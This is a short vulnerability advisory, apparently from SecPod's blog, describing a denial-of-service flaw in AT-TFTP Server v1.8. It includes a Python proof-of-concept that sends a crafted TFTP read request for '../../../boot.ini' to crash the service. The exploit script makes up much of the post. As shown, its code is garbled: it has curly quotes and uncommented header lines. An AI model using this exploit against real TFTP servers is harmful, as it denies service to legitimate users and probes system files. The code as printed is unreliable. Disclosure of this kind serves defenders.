AT-TFTP Server v1.8 Remote Denial of Service Vulnerability
SecPod Research Team member (Antu Sanadi) has found a Denial of Service vulnerability in Allied Telesyn TFTP Server. The vulnerability is caused by an error in the “TFTPD.EXE”, which causes the server to crash when no acknowledgment response is sent back to the server after a successful ‘read’. The ...
SecPod Research Team member (Antu Sanadi) has found a Denial of Service vulnerability in Allied Telesyn TFTP Server. The vulnerability is caused by an error in the “TFTPD.EXE”, which causes the server to crash when no acknowledgment response is sent back to the server after a successful ‘read’. The flaw can be exploited to crash a vulnerable server denying service to legitimate users.
POC : Download here
More information can be found here.
[code=python]#!/usr/bin/python
##############################################################################
Exploit : http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
Reference : https://www.secpod.com/blog/?p=194
# : http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt
Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
Exploit will crash AT-TFTP Server v1.8 Service
Tested against AT-TFTP Server v1.8 server
##############################################################################
import socket
import sys
host = ‘127.0.0.1’
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
addr = (host,port)
data =’\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f’ +\
‘\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00’
s.sendto(data, (host, port))
[/code]
Welcome any feedback or suggestion.
Cheers!
SecPod Research Team